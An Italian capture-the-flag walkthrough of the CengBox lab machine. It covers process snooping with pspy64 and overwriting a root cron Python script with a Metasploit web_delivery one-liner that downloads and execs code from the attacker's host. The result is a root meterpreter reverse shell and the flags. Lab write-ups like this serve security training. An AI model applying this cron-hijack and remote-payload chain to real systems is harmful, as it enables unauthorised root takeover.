HackingLab – CEng Company

All’interno della directory /home/cengover troviamo il file user.txt che contiene un’altra flag: 8f7f6471e2e869f029a75c5de601d5e0

cengover@cengbox:/home$ cd cengover
cd cengover
cengover@cengbox:~$ ls -al
ls -al
total 116
drwx------ 4 cengover cengover 4096 Apr 29 18:50 .
drwxr-xr-x 4 root     root     4096 Apr 25 23:01 ..
-rw------- 1 cengover cengover    0 Apr 29 18:50 .bash_history
-rw-r--r-- 1 cengover cengover  220 Apr 25 23:01 .bash_logout
-rw-r--r-- 1 cengover cengover 3771 Apr 25 23:01 .bashrc
drwx------ 2 cengover cengover 4096 Apr 25 23:08 .cache
lrwxrwxrwx 1 cengover cengover   34 Apr 25 23:01 .ecryptfs -> /home/.ecryptfs/cengover/.ecryptfs
-rw------- 1 cengover cengover  478 Apr 27 19:01 .mysql_history
drwxrwxr-x 2 cengover cengover 4096 Apr 26 21:31 .nano
lrwxrwxrwx 1 cengover cengover   33 Apr 25 23:01 .Private -> /home/.ecryptfs/cengover/.Private
-rw-r--r-- 1 cengover cengover  655 Apr 25 23:01 .profile
-rw-r--r-- 1 cengover cengover    0 Apr 25 23:10 .sudo_as_admin_successful
-rw-rw-r-- 1 cengover cengover   33 Apr 29 18:43 user.txt
-rw------- 1 cengover cengover 7148 Apr 29 16:12 .viminfo
cengover@cengbox:~$ cat user.txt
cat user.txt
8f7f6471e2e869f029a75c5de601d5e0

Scarichiamo con wget pspy64 uno script che permette di vedere i processi in esecuzione per vedere se ci sono processi che girano con privilegi di root che possiamo utilizzare per una escalation di privilegi.

cengover@cengbox:~$ cd /tmp
cd /tmp
cengover@cengbox:/tmp$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
< https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64     
--2020-06-06 16:14:09--  https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolving github.com (github.com)... 140.82.118.4
Connecting to github.com (github.com)|140.82.118.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.94M  2.87MB/s    in 1.0s    

2020-06-06 16:14:11 (2.87 MB/s) - ‘pspy64’ saved [3078592/3078592]

Eseguiamo pspy64 dopo aver modificato i privilegi per renderlo eseguibile ed osserviamo che abbiamo un processo /bin/sh -c /usr/bin/python3 /opt/md5check.py che viene eseguito con privilegi di root; verifichiamo i privilegi di accesso con file <NOME FILE>; il file è scrivibile dal nostro utente.

cengover@cengbox:/$ cd /opt
cd /opt
cengover@cengbox:/opt$ ls -al
ls -al
total 12
drwxr-xr-x  2 root root  4096 Apr 28 13:35 .
drwxr-xr-x 23 root root  4096 Jun  6 09:06 ..
-rw-rw----  1 root users  545 Apr 29 16:12 md5check.py

Una soluzione all’ottenere una shell di root è quella di inserire un payload all’interno dello script md5check in modo che venga eseguito da crontab; la scelta del payload cade su web_delivery che troviamo in metasploit. Effettuiamo quindi la ricerca e selezioniamo il payload con il comando use <NOME PAYLOAD>.

msf5 > search web_delivery

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   1  exploit/multi/script/web_delivery                           2013-07-19       manual     No     Script Web Delivery


msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python

Impostiamo le variabili LHOST e LPORT con l’IP della nostra macchina attaccante e con la porta che decidiamo porre in ascolto.
Generiamo quindi il payload con il comando exploit.

msf5 exploit(multi/script/web_delivery) > set lhost 192.168.188.75
lhost => 192.168.188.75
msf5 exploit(multi/script/web_delivery) > set lport 4456
lport => 4456
msf5 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.188.75:4456 
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/2FOXNncvyd
[*] Local IP: http://192.168.188.75:8080/2FOXNncvyd
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());"

Con il comando echo inseriamo il payload all’interno dello script md5check.py avendo cura di NON inserire il comand python -c.

cengover@cengbox:/opt$ echo "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());" > md5check.py                                                                                                    
<sl._create_unverified_context());exec(r.read());" > md5check.py                                                            
cengover@cengbox:/opt$ cat md5check.py                                                                                      
cat md5check.py
import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.188.75:8080/2FOXNncvyd', context=ssl._create_unverified_context());exec(r.read());

Dopo quale minuto viene eseguito lo script ed otteniamo l’accesso come root.

[*] 192.168.188.81   web_delivery - Delivering Payload (437 bytes)
[*] Sending stage (53755 bytes) to 192.168.188.81
[*] Meterpreter session 1 opened (192.168.188.53:6789 -> 192.168.188.81:51770) at 2020-06-07 12:18:57 -0400
msf5 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 5...

meterpreter > cd /root
meterpreter > ls -al
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  5      fil   2020-04-29 11:50:28 -0400  .bash_history
100644/rw-r--r--  3106   fil   2020-04-25 15:51:03 -0400  .bashrc
40755/rwxr-xr-x   4096   dir   2020-04-26 06:30:38 -0400  .nano
100644/rw-r--r--  148    fil   2020-04-25 15:51:03 -0400  .profile
100644/rw-r--r--  66     fil   2020-04-28 06:48:09 -0400  .selected_editor
100600/rw-------  5362   fil   2020-04-29 11:50:19 -0400  .viminfo
100644/rw-r--r--  48861  fil   2020-06-07 00:24:01 -0400  note.txt
100644/rw-r--r--  420    fil   2020-04-29 11:50:19 -0400  root.txt

meterpreter > 

Ottenuta la shell navighiamo nella directory root e ne vediamo il contenuto.

meterpreter > cat root.txt
 / ____|  ____|           |  _ \           
| |    | |__   _ __   __ _| |_) | _____  __
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ /
| |____| |____| | | | (_| | |_) | (_) >  < 
 \_____|______|_| |_|\__, |____/ \___/_/\_\
                      __/ |                
                     |___/                 

Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_

a51e522b22a439b8e1b22d84f71cf0f2

Leave a Reply

Your email address will not be published. Required fields are marked *